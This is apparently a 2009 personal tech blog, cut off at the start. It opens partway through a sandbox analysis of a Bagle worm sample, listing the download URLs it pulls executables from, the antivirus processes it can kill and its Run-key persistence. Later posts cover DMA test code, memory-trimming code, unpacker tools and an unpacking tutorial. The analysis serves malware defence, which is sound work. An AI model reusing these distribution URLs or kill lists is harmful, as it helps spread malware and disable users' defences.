      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe.config = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\cscompui.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cscompmgd.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cscomp.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cvtres.exe = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\CvtResUI.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft.JScript.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft.JScript.tlb = 0x00000002


Other details

  • To mark the presence in the system, the following Mutex object was created:
    • DBWinMutex
  • The following Host Name was requested from a host database:
    • www.ru
  • The following Internet downloads were started (the retrieved bits are saved into the local file):

URL to be downloaded
Filename for the downloaded bits

http://www.courdesloges.com/files2.php
%System%\drivers\down\407265.exe

http://aytocristobal.com/files2.php
%System%\drivers\down\407312.exe

http://cuidatumiembro.com/files2.php
%System%\drivers\down\407328.exe

http://maneironsclimb.com/files2.php
%System%\drivers\down\407328.exe

http://www.etraining.ee/files2.php
%System%\drivers\down\407343.exe

http://dancefrequency.com.br/files2.php
%System%\drivers\down\407343.exe

http://darioo.altervista.org/files2.php
%System%\drivers\down\407359.exe

http://daruliftaa.com/files2.php
%System%\drivers\down\407406.exe

http://datalifecenter.com/files2.php
%System%\drivers\down\407421.exe

http://datissa.com/files2.php
%System%\drivers\down\407421.exe

http://www.dbmetric.com/files2.php
%System%\drivers\down\407421.exe

http://WWW.DDP.COM.PE/files2.php
%System%\drivers\down\407437.exe

http://www.debmark.com/files2.php
%System%\drivers\down\407437.exe

http://decastrogil.es/files2.php
%System%\drivers\down\407484.exe

http://delattres.com/files2.php
%System%\drivers\down\407484.exe

http://demianaiello.com.ar/files2.php
%System%\drivers\down\407500.exe

http://demo.portaltapejara.com/files2.php
%System%\drivers\down\407500.exe

http://derechoydemocracia.es/files2.php
%System%\drivers\down\407515.exe

http://www.devergo.com/files2.php
%System%\drivers\down\407531.exe

http://dezaete.nl/files2.php
%System%\drivers\down\407531.exe

http://dieppeseinemaritime.com/files2.php
%System%\drivers\down\407531.exe

http://digitalpicture.com/files2.php
%System%\drivers\down\407578.exe

http://digicromo.com/files2.php
%System%\drivers\down\407578.exe

http://diocesequebec.qc.ca/files2.php
%System%\drivers\down\407593.exe

http://divinaclub.com/files2.php
%System%\drivers\down\407593.exe

http://divinojocelyn.altervista.org/files2.php
%System%\drivers\down\407609.exe

http://dj-horoz.com/files2.php
%System%\drivers\down\407609.exe

http://djsoprano.cp.win.pl/files2.php
%System%\drivers\down\407609.exe

http://djthefox.com/files2.php
%System%\drivers\down\407625.exe

http://deniselinsconvites.com.br/files2.php
%System%\drivers\down\407687.exe

http://lotva.org/files2.php
%System%\drivers\down\407703.exe

http://oliwia.iskierka.org/files2.php
%System%\drivers\down\407703.exe

http://dospablos.es/files2.php
%System%\drivers\down\407703.exe

http://dponcemi.altervista.org/files2.php
%System%\drivers\down\407718.exe

http://drutplast.com.pl/files2.php
%System%\drivers\down\407765.exe

http://dudys.bx.pl/files2.php
%System%\drivers\down\407765.exe

http://dukedem.com/files2.php
%System%\drivers\down\407781.exe

http://dddesignstudio.com/files2.php
%System%\drivers\down\407796.exe

http://easylimo.es/files2.php
%System%\drivers\down\407828.exe

http://doctorlife.org/files2.php
%System%\drivers\down\407859.exe

http://eccesso.es/files2.php
%System%\drivers\down\407859.exe

http://ecobos.be/files2.php
%System%\drivers\down\407875.exe

http://www.edenvillage.it/files2.php
%System%\drivers\down\407875.exe

http://programaseducativos-salamanca.com/files2.php
%System%\drivers\down\407890.exe

http://www.ekogips.pl/files2.php
%System%\drivers\down\407890.exe

http://www.ekotap.pl/files2.php
%System%\drivers\down\407906.exe

http://elelfogris.com/files2.php
%System%\drivers\down\407906.exe

http://elemco.pl/files2.php
%System%\drivers\down\407906.exe

http://elitan.pl/files2.php
%System%\drivers\down\407953.exe

http://passecdl.co.uk/files2.php
%System%\drivers\down\407953.exe

http://www.elotron.com/files2.php
%System%\drivers\down\407968.exe

http://elpantalan.es/files2.php
%System%\drivers\down\407968.exe

http://industriascarnicaselrobledo.com/files2.php
%System%\drivers\down\407984.exe

http://www.enco-group.cz/files2.php
%System%\drivers\down\407984.exe

http://energiesport.com/files2.php
%System%\drivers\down\407984.exe

http://epamateohernandez.com/files2.php
%System%\drivers\down\408000.exe

http://eravamo100.altervista.org/files2.php
%System%\drivers\down\408000.exe

http://esf-ct.com/files2.php
%System%\drivers\down\408031.exe

http://espaciojoven.org/files2.php
%System%\drivers\down\408046.exe

http://www.espaceprojets-villejuif.fr/files2.php
%System%\drivers\down\408062.exe

http://www.eszterlancaruhaz.hu/files2.php
%System%\drivers\down\408062.exe

http://www.etalon-stroy.ru/files2.php
%System%\drivers\down\408062.exe

http://www.experiment.lv/files2.php
%System%\drivers\down\408078.exe

http://streetlions.com/files2.php
%System%\drivers\down\408078.exe

http://www.false-news.com/files2.php
%System%\drivers\down\408093.exe

http://falshpolcom.18.com1.ru/files2.php
%System%\drivers\down\408093.exe

http://www.concretosfamasa.com/files2.php
%System%\drivers\down\408140.exe

http://fermesdemarie.eolas-services.com/files2.php
%System%\drivers\down\408156.exe

http://fernandoaureliano.com/files2.php
%System%\drivers\down\408156.exe

http://fetems.org.br/files2.php
%System%\drivers\down\408171.exe

http://wolfsdonksport.be/files2.php
%System%\drivers\down\408171.exe

http://filibertovillalobosguijuelo.com/files2.php
%System%\drivers\down\408171.exe

http://finz-center.com/files2.php
%System%\drivers\down\408187.exe

http://www.fitdina.com/files2.php
%System%\drivers\down\408187.exe

http://fiveuk.fi.funpic.org/files2.php
%System%\drivers\down\408203.exe

http://flabs.net/files2.php
%System%\drivers\down\408234.exe

http://fomentocredito.es/files2.php
%System%\drivers\down\408234.exe

http://fortis-sf.home.pl/files2.php
%System%\drivers\down\408250.exe

http://fotoastur.com/files2.php
%System%\drivers\down\408250.exe

http://fouadovedia.com/files2.php
%System%\drivers\down\408250.exe

http://foxx.fan-sites.org/files2.php
%System%\drivers\down\408265.exe

http://frauen-ratgeber.com/files2.php
%System%\drivers\down\408265.exe

http://fritschiclean.ch/files2.php
%System%\drivers\down\408281.exe

http://www.kfzeintragsservice.de/files2.php
%System%\drivers\down\408281.exe

http://www.autometasuche.de./files2.php
%System%\drivers\down\408281.exe

http://www.s-w-services.co.uk/files2.php
%System%\drivers\down\408328.exe

http://www.bodis.at/files2.php
%System%\drivers\down\408343.exe

http://www.musikverein-grosswallstadt.de/files2.php
%System%\drivers\down\408343.exe

http://tripplexwelt.de/files2.php
%System%\drivers\down\408359.exe

http://www.weingut-giegerich.de/files2.php
%System%\drivers\down\408359.exe

http://www.tenbrink-online.de/files2.php
%System%\drivers\down\408375.exe

http://www.alphazip.com/files2.php
%System%\drivers\down\408375.exe

http://www.kayaks.cz/files2.php
%System%\drivers\down\408390.exe

http://galami.sk/files2.php
%System%\drivers\down\408406.exe

http://galateainteriorismo.com/files2.php
%System%\drivers\down\408421.exe

http://galixesol.com/files2.php
%System%\drivers\down\408437.exe

http://www.gan-psifas.co.il/files2.php
%System%\drivers\down\408437.exe

http://robertsandboles.co.nz/files2.php
%System%\drivers\down\408468.exe

http://gazetaszkolna.edu.pl/files2.php
%System%\drivers\down\408468.exe

http://gdri.si/files2.php
%System%\drivers\down\408484.exe

http://generation80.be/files2.php
%System%\drivers\down\408531.exe

Heuristics Analysis

  • Heuristically identified capability to terminate the following security related processes:

_avp32.exe
_avpcc.exe
_avpm.exe
ackwin32.exe
alertsvc.exe
alogserv.exe
anti-trojan.exe
antivirus.exe
ants.exe
apvxdwin.exe
armor2net.exe
atcon.exe
atupdater.exe
atwatch.exe
aupdate.exe
autodown.exe
autotrace.exe
autoupdate.exe
avconsol.exe
avengine.exe
avgcc32.exe
avgctrl.exe
avgnt.exe
avgserv.exe
avguard.exe
avgw.exe
avkserv.exe
avkservice.exe
avp.exe
avp32.exe
avpcc.exe
avpm.exe
avpupd.exe
avsched32.exe
avsynmgr.exe
avwupd32.exe
avwupsrv.exe
avxmonitor9x.exe
avxmonitornt.exe
avxquar.exe
blackd.exe
blackice.exe
ccapp.exe
ccevtmgr.exe
ccproxy.exe
cfiaudit.exe
claw95.exe
claw95cf.exe
cleaner.exe
cleaner3.exe
cmgrdian.exe
cpd.exe
defwatch.exe
doors.exe
drweb32w.exe
drwebupw.exe
escanh95.exe
escanhnt.exe
f-agnt95.exe
fameh32.exe
fast.exe
fch32.exe
firewall.exe
f-prot95.exe
frameworkservice.exe
frw.exe
fsav.exe
fsav32.exe
fsgk32.exe
fsm32.exe
fsma32.exe
fsmb32.exe
f-stopw.exe
guard.exe
iamapp.exe
iamserv.exe
icload95.exe
icloadnt.exe
icmon.exe
icssuppnt.exe
icsupp95.exe
icsuppnt.exe
iface.exe
iomon98.exe
isrv95.exe
jedi.exe
kavpf.exe
livesrv.exe
lockdown2000.exe
luall.exe
lucomserver.exe
luinit.exe
mcagent.exe
mcmnhdlr.exe
mcshield.exe
mcupdate.exe
mcvsshld.exe
minilog.exe
monitor.exe
moolive.exe
navapsvc.exe
navapw32.exe
navlu32.exe
navstub.exe
navw32.exe
navwnt.exe
ndd32.exe
neowatchlog.exe
nisum.exe
nmain.exe
nod32.exe
nod32krn.exe
normist.exe
notstart.exe
nprotect.exe
nsched32.exe
ntrtscan.exe
ntxconfig.exe
nupgrade.exe
nvc95.exe
nwservice.exe
outpost.exe
pavfires.exe
pavfnsvr.exe
pavproxy.exe
pavsrv51.exe
pcciomon.exe
pccntmon.exe
persfw.exe
pop3trap.exe
poproxy.exe
pxagent.exe
realmon.exe
rescue.exe
rtvscan.exe
rtvscn95.exe
rulaunch.exe
savscan.exe
scan32.exe
shstat.exe
smc.exe
sndsrvc.exe
sphinx.exe
spyxx.exe
ss3edit.exe
swnetsup.exe
symlcsvc.exe
symproxysvc.exe
taumon.exe
tc.exe
tca.exe
tcm.exe
tds-3.exe
tfak.exe
trjscan.exe
update.exe
updaterui.exe
vettray.exe
vptray.exe
vsecomr.exe
vshwin32.exe
vsmon.exe
vsserv.exe
vsstat.exe
watchdog.exe
webscanx.exe
webtrap.exe
wgfe95.exe
wradmin.exe
wrctrl.exe
xcommsvr.exe
zatutor.exe
zauinst.exe
zonealarm.exe

Downloaded File Summary:

  • Summary of the findings:

What's been found
Severity Level

Creates a startup registry entry.

Contains characteristics of an identified security risk.

Technical Details:


Possible Security Risk

  • Attention! The following threat categories were identified:

Threat Category
Description


A network-aware worm that attempts to replicate across the existing network(s)


A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment


File System Modifications

  • The following file was created in the system:

#
Filename(s)
File Size
File Hash
Alias

1
%AppData%\m\flec006.exe
[file and pathname of the sample #1]
99,844 bytes
MD5: 0x3F4F042FC88BC862989DD6702E19D917
SHA-1: 0x566DD782D6E49431A401A43087DBC7AACE784C17
Trojan.Lodeight.C [Symantec]
Email-Worm.Win32.Bagle.of [Kaspersky Lab]
W32/Bagle.gen [McAfee]
TROJ_BAGLE.AO [Trend Micro]
Mal/Packer, Mal/Behav-191, Mal/Bagpk-D [Sophos]
Worm:Win32/Bagle.gen!C [Microsoft]
Email-Worm.Win32.Bagle [Ikarus]
Win32/MalPackedB.suspicious [AhnLab]

  • Note:
    • %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.
  • The following directory was created:
    • %AppData%\m


Memory Modifications

  • There were new processes created in the system:

Process Name
Process Filename
Main Module Size

flec006.exe
%AppData%\m\flec006.exe
261,617 bytes

[filename of the sample #1]
[file and pathname of the sample #1]
261,617 bytes


Registry Modifications

  • The newly created Registry Value is:
    • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
      • mule_st_key = "%AppData%\m\flec006.exe"

      so that flec006.exe runs every time Windows starts


Other details

  • The following Host Name was requested from a host database:
    • google.com

Sunday, April 12, 2009

new eink reader

reader

http://reader.txtr.com/specifications.html

Technical specifications

Main features
  • eInk Vizplex 6" display at 600x800 pixels
  • 146mm x 128.2mm x 8mm, 260g
  • Freescale ARM11 CPU 532MHz
  • capacitive slider interface
  • next generation Epson display controller
  • Linux kernel
  • integrated 3D accelerometer for automatic orientation detection
  • full integration with txtr online community platform
Power
  • eInk-optimized power management system
  • Li-Ion battery
  • charged via USB

Memory
  • 64MB SDRAM onboard
  • MicroSD memory card slot
  • 8GB MicroSD card included
Communication
  • internal 3G/GPRS modem
  • USB 2.0 cable connection
  • Bluetooth 2.1 for audio, external keyboard and future enhancements
  • WiFi
  • low power 2.4GHz near range communication

Saturday, April 11, 2009

使用低階方式存取各類型端口 for XP (inpout32.dll)

使用低階方式存取各類型端口 for XP (inpout32.dll)

http://tw.myblog.yahoo.com/gaptx/article?mid=747&prev=750&next=739

Inpout32.dll for Windows 98/2000/NT/XP:

http://logix4u.net/Legacy_Ports/Parallel_Port/Inpout32.dll_for_Windows_98/2000/NT/XP.html

How Inpout32.dll works ?

http://logix4u.net/Legacy_Ports/Parallel_Port/How_Inpout32.dll_works_.html

inpout32.dll:

http://logix4u.net/inpout32_source_and_bins.zip

linux mm drop caches

Kernels 2.6.16 以後的版本, 可藉由以下指令釋放出 Caches 佔住的記憶體

# echo 1 > /proc/sys/vm/drop_caches
To free dentries and inodes:

# echo 2 > /proc/sys/vm/drop_caches
To free pagecache, dentries and inodes:

# echo 3 > /proc/sys/vm/drop_caches
As this is a non-destructive operation and dirty objects are not freeable, the user should run "sync" first!

ref. Drop Caches - linux-mm.org Wiki ( http://linux-mm.org/Drop_Caches )

Sunday, April 05, 2009

2440 dma

/*****************************************
NAME: dma.c
DESC: DMA memory2memory test
*****************************************/

#include <string.h>
#include "def.h"
#include "option.h"
#include "2440addr.h"
#include "2440lib.h"
#include "2440slib.h"

static void __irq Dma0Done(void);
static void __irq Dma1Done(void);
static void __irq Dma2Done(void);
static void __irq Dma3Done(void);
void DMA_M2M(int ch,int srcAddr,int dstAddr,int tc,int dsz,int burst);

typedef struct tagDMA
{
volatile U32 DISRC; //0x0
volatile U32 DISRCC; //0x4
volatile U32 DIDST; //0x8
volatile U32 DIDSTC; //0xc
volatile U32 DCON; //0x10
volatile U32 DSTAT; //0x14
volatile U32 DCSRC; //0x18
volatile U32 DCDST; //0x1c
volatile U32 DMASKTRIG; //0x20
}DMA;

static volatile int dmaDone;

void Test_DMA(void)
{
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst
//DMA Ch 0
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(0,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

//DMA Ch 1
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(1,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

//DMA Ch 2
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(2,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

//DMA Ch 3
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x80000,0,0); //byte,single
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x40000,1,0); //halfword,single
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,2,0); //word,single
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x20000,0,1); //byte,burst
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000,0x10000,1,1); //halfword,burst
DMA_M2M(3,_NONCACHE_STARTADDRESS,_NONCACHE_STARTADDRESS+0x800000, 0x8000,2,1); //word,burst

}

void DMA_M2M(int ch,int srcAddr,int dstAddr,int tc,int dsz,int burst)
{
int i,time;
volatile U32 memSum0=0,memSum1=0;
DMA *pDMA;
int length;
length=tc*(burst ? 4:1)*((dsz==0)+(dsz==1)*2+(dsz==2)*4);
Uart_Printf("[DMA%d MEM2MEM Test]\n",ch);

switch(ch)
{
case 0:
pISR_DMA0=(int)Dma0Done;
rINTMSK&=~(BIT_DMA0);
pDMA=(void *)0x4b000000;
break;
case 1:
pISR_DMA1=(int)Dma1Done;
rINTMSK&=~(BIT_DMA1);
pDMA=(void *)0x4b000040;
break;
case 2:
pISR_DMA2=(int)Dma2Done;
rINTMSK&=~(BIT_DMA2);
pDMA=(void *)0x4b000080;
break;
case 3:
pISR_DMA3=(int)Dma3Done;
rINTMSK&=~(BIT_DMA3);
pDMA=(void *)0x4b0000c0;
break;
}
Uart_Printf("DMA%d %8xh->%8xh,size=%xh(tc=%xh),dsz=%d,burst=%d\n",ch, srcAddr,dstAddr,length,tc,dsz,burst);

Uart_Printf("Initialize the src.\n");
for(i=srcAddr;i<(srcAddr+length);i+=4)
{
*((U32 *)i)=i^0x55aa5aa5;
memSum0+=i^0x55aa5aa5;
}

Uart_Printf("DMA%d start\n",ch);
dmaDone=0;
pDMA->DISRC=srcAddr;
pDMA->DISRCC=(0<<1)(0<<0); // inc,AHB
pDMA->DIDST=dstAddr;
pDMA->DIDSTC=(0<<2) (0<<1)(0<<0); // inc,AHB
pDMA->DCON=tc((unsigned int)1<<31)(1<<30)(1<<29)(burst<<28)(1<<27)\
(0<<23)(1<<22)(dsz<<20)(tc);
//HS,AHB,TC interrupt,whole, SW request mode,relaod off
pDMA->DMASKTRIG=(1<<1)1; //DMA on, SW_TRIG

Timer_Start(3);//128us resolution
while(dmaDone==0);
time=Timer_Stop();
Uart_Printf("DMA transfer done. time=%f, %fMB/S\n",(float)time/ONESEC3, length/((float)time/ONESEC3)/1000000.);
rINTMSK=BIT_ALLMSK;
for(i=dstAddr;i<dstAddr+length;i+=4)
{
memSum1+=*((U32 *)i)=i^0x55aa5aa5;
}
Uart_Printf("memSum0=%x,memSum1=%x\n",memSum0,memSum1);
if(memSum0==memSum1)
Uart_Printf("DMA test result--------------------------------------O.K.\n");
else
Uart_Printf("DMA test result--------------------------------------ERROR!!!\n");

}

static void __irq Dma0Done(void)
{
ClearPending(BIT_DMA0);
dmaDone=1;
}

static void __irq Dma1Done(void)
{
ClearPending(BIT_DMA1);
dmaDone=1;
}

static void __irq Dma2Done(void)
{
ClearPending(BIT_DMA2);
dmaDone=1;
}

static void __irq Dma3Done(void)
{
ClearPending(BIT_DMA3);
dmaDone=1;
}

Monday, March 30, 2009

cleanMem

#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include "psapi.h"

#pragma comment(lib, "psapi.lib")

void PrintProcessNameAndID( DWORD processID )
{
    TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");

    // Get a handle to the process.
    // must set access right: PROCESS_ALL_ACCESS
    HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS
        /*| PROCESS_QUERY_INFORMATION | PROCESS_VM_READ */,
                                   FALSE, processID );

    // Get the process name.

    if (NULL != hProcess )
    {
        HMODULE hMod;
        DWORD cbNeeded;

        if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod),
             &cbNeeded) )
        {
            GetModuleBaseName( hProcess, hMod, szProcessName,
                               sizeof(szProcessName)/sizeof(TCHAR) );
        }
    }

    // Print the process name and identifier.

    _tprintf( TEXT("%s  (PID: %u)\n"), szProcessName, processID );

    EmptyWorkingSet( hProcess );

    CloseHandle( hProcess );
}

void main( )
{
    // Get the list of process identifiers.

    DWORD aProcesses[1024], cbNeeded, cProcesses;
    unsigned int i;

    if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
        return;

    // Calculate how many process identifiers were returned.

    cProcesses = cbNeeded / sizeof(DWORD);

    // Print the name and process identifier for each process.

    for ( i = 0; i < cProcesses; i++ )
        if( aProcesses[i] != 0 )
            PrintProcessNameAndID( aProcesses[i] );
}

Saturday, March 28, 2009

cleanMem

#A quick note on the API call itself. This is the same API used by Microsoft in its empty.exe in the Windows 2003 Resource kit. This is also the same api that all .Net programs use by default when you minimize them and their memory lowers. So now instead of being just for .Net, Cleanmem lets you use it on all your programs.

#

http://msdn.microsoft.com/en-us/library/ms682606(VS.85).aspx
EmptyWorkingSet Function
Removes as many pages as possible from the working set of the specified process.

http://msdn.microsoft.com/en-us/library/ms686234(VS.85).aspx
SetProcessWorkingSetSize Function
Sets the minimum and maximum working set sizes for the specified process.

SetProcessWorkingSetSize does force memory to the page file because it limits how much memory the process can have.
EmptyWorkingSet is a cleanup api from Microsoft that doesn’t limit anything it simply removed the unused.

EmptyWorkingSet Function

Removes as many pages as possible from the working set of the specified process.

Syntax

C++

BOOL WINAPI EmptyWorkingSet(
__in HANDLE hProcess
);


Parameters

hProcess [in]

A handle to the process. The handle must have the PROCESS_QUERY_INFORMATION and PROCESS_SET_INFORMATION access rights. For more information, see Process Security and Access Rights.




Return Value


If the function succeeds, the return value is nonzero.



If the function fails, the return value is zero. To get extended error information, call GetLastError.



#Enumerating All Processes



http://msdn.microsoft.com/en-us/library/ms682623(VS.85).aspx



#…



HANDLE hProcess = OpenProcess(  PROCESS_ALL_ACCESS ,

                               FALSE, processID );



# …

deltree in xp

deltree in xp

http://www.raymond.cc/blog/archives/2007/09/24/deltree-command-replacement-in-windows-2000-or-windows-xp/

http://blog.vivekjishtu.com/2006/02/deltree-in-windows-xp.html

del /s /q %1
rd /s /q %1

Saturday, March 21, 2009

網購騙徒大挪移 買家賣家都被削

網購騙徒大挪移 買家賣家都被削
更新日期:2009/03/22 03:22

網購詐騙又出現新手法!歹徒以「移花接木」方式,利用網路買賣的高低價差,設計讓買家付了款卻拿不到貨,還讓賣家在不知情下成為詐欺集團的人頭帳戶,買賣雙方皆成受害者。
根據統計,類似「網路拍賣未收到貨」的案例,從一月至今,警方已至少受理一千五百件報案,增加的速度僅次於「購物個資外洩」,呼籲民眾要防範。
警方表示,歹徒「移花接木」的新手法,是先在網路上張貼販賣高價貨物的廣告,誘騙甲方買家上當後,再向乙方的賣家假稱要購買低價貨品,要甲方將貨款匯給乙方,再向乙方表示匯錯金額,要求在「面交」時,一併退還差額。
歹徒取貨拿錢走人後,原先匯款的甲方遲遲等不到貨,發現上當後報警,警方將乙方的帳戶列為警示凍結,並循線找上門,乙方才知道被歹徒利用,成為取款的「人頭」。
警方表示,目前已知有兩組網購的被害買、賣家,第一組的甲方是向歹徒購買一萬七千元的手機,歹徒則向乙方買一萬元的皮夾;第二組的甲方則是向歹徒買七千五百元的手機,歹徒則向乙方買五百元的布娃娃,兩起買賣歹徒都「正好」獲利七千元。

Friday, March 20, 2009

kkrunchy esp定律

UnKK 1.0 - Unpacker for kkrunchy 0.23a2 +src

http://letitbit.net/download/a04cb3680016/unkk.zip.html

http://reversengineering.wordpress.com/2008/08/02/unkk-10-unpacker-for-kkrunchy-023a2-src/

http://reversengineering.wordpress.com/category/tools/unpackers/

#

http://www.farbrausch.de/~fg/kkrunchy/

kkrunchy is a small exe packer primarily meant for 64k intros

#

GUnPacker.V0.4 generick unpacker & helper
ACProtect 1.09、1.32、1.41、2.0
AHPack 0.1
ASPack 102b、105b、1061、107b、1082、1083、1084、2000、2001、21、211c、211d、211r、212、212b212r
ASProtect 1.1,1.2,1.23RC1,1.33,1.35,1.40,SKE.2.11,SKE.2.1,SKE.2.2,2.3.04.26,2.4.09.11
Alloy 4.1、4.3
alexprot 1.0b2
Beria 0.07
Bero 1
BJFNT 1.2、1.3
Cexe 10a、10b
DragonArmor 1
DBpe 2.33
EPPort 0.3
eXe32Pack 1.42
EXECrypt 1
eXeStealth 2.75a、2.76、2.64、2.73、2.76、3.16(支持,但效果不是很好)
ExeSax 0.9.1(支持,但效果不是很好)
eXPressor 1.4.5.1、1.3(支持,但效果不是很好)
FengYue’Dll unknow
FSG 1.33、2.0、fsg2.0bart、fsg2.0dulek
GHF Protector v1.0(支持,但效果不是很好)
Krypton 0.2、0.3、0.4、0.5(For ALL 支持,但效果不是很好)
Hmimys Packer UnKown
JDProtect 0.9、1.01、2.0
KByS unknow
MaskPE 1.6、1.7、2.0
MEW 11 1.0/1.2、mew10、mew11_1.2、mew11_1.2_2、mew5
molebox 2.61、2.65
morphine 2.7(支持,但效果不是很好)
MKFpack 1
Mpress UnKown
Mucki 1
neolite 2
NCPH 1
nsapck 2.3、2.4、3.1
Obsidium 1.0.0.69、1.1.1.4(For ALL 支持,但效果不是很好)
Packman UnKown
PCShrink 0.71
PC-Guard v5.0、4.06c
PE Cryptor 1.5
PEBundle 2.3、2.44、3.0、3.2
PE-Armor 0.46、0.49、0.75、0.765
PECompact 1.x
PEDiminisher 0.1
PELock 1.06
PEncrypt 4
pepack 0.99、1.0
PELockNt 2.01、2.03、2.04
PEtite 1.2、1.3、1.4、2.2、2.3
PKlite32 1.1
PolyCryptA UnKown
peshield 0.2b2(支持,但效果不是很好)
PESpin 0.3(支持,但效果不是很好)、0.7、1.1、1.3
PEX 0.99
PolyCrypt PE 1.42
PUNiSHER 1.5(支持,但效果不是很好)
RLPack 1.1、1.6、1.7、1.8
Rubbish 2
ShrinkWrap 1.4
SDProtector 1.12、1.16
SLVc0deprotector 0.61(支持,但效果不是很好)、1.12
SimplePack 1.0、1.1、1.2
SoftSentry 3.0(支持,但效果不是很好)
Stealth PE 1.01、2.1
Stone’s PE Encryptor 1.13
SVKP 1.11、1.32、1.43
ThemidaDemo 1.0.0.5
teLock 0.42、0.51、0.60、0.70、0.71、0.80、0.85、0.90、0.92、0.95、0.96、0.98、0.99
Upc All
Upack “0.1、0.11、0.12、0.20、0.21、0.22、0.23、0.24、0.25、0.26、0.27、0.29、
0.30、0.31、0.32、0.33、0.34、0.35、0.36、0.37、0.38、0.39、0.399″
UPolyX 0.2、0.5
UPX “0.51、0.60、0.61、0.62、0.71、0.72、0.80、0.81、0.82、0.83、0.84、0.896、
1.0w、1.03、1.04、1.25w、2.0w、2.02、2.03、3.03、UPX-Scrambler RC1.x”
V2Packer 0.02
VisualProtect 2.57
Vprotector 1.2
WindCrypt 1.0
wwpack32 v1.20、v1.11、v1.12
WinKript 1
yoda’s cryptor v1.1、v1.2
YZPACK 2.0
yoda’s Protector v1.02、v1.03.2、v1.03.3、v1.0b

original & unpacked:BY PAVKA
http://letitbit.net/download/e26a01440450/GUnPacker.V0.4.By.rar.html

#

ESP定律【轉自飄雲閣】

18 Sep, 2008  軟體安全

ESP定律【實用+重要】

1.前言
在教程中經常看到ESP定律,現在我就來告訴大家什麼是ESP定律,它的原理是什

麼!!(太有用了◎)

BTW:在看完了手動脫殼入門十八篇了以後,再看這篇文章也許會對你更有幫助!

2.準備知識 在我們開始討論ESP定律之前,我先給你講解一下一些簡單的彙編知識。
  1.call
這個命令是訪問副程式的一個彙編基本指令。也許你說,這個我早就知道了!別急請繼續看完。
  call真正的意義是什麼呢?我們可以這樣來理解:1.向堆疊中壓入下一行程式的位址;2.JMP到call的副程式位址處。例如:

00401029    .  E8 DA240A00    call 004A3508
0040102E    .  5A             pop edx
在執行了00401029以後,程式會將0040102E壓入堆疊,然後JMP到004A3508位址處!
  2.RET
與call對應的就是RET了。對於RET我們可以這樣來理解:1.將當前的ESP中指向的地址出棧;2.JMP到這個位址。
這個就完成了一次調用副程式的過程。在這裏關鍵的地方是:如果我們要返回父程式,則當我們在堆疊中進行堆疊的操作的時候,一定要保證在RET這條指令之前,ESP指向的是我們壓入棧中的地址。這也就是著名的“堆疊平衡”原理!

3.狹義ESP定律
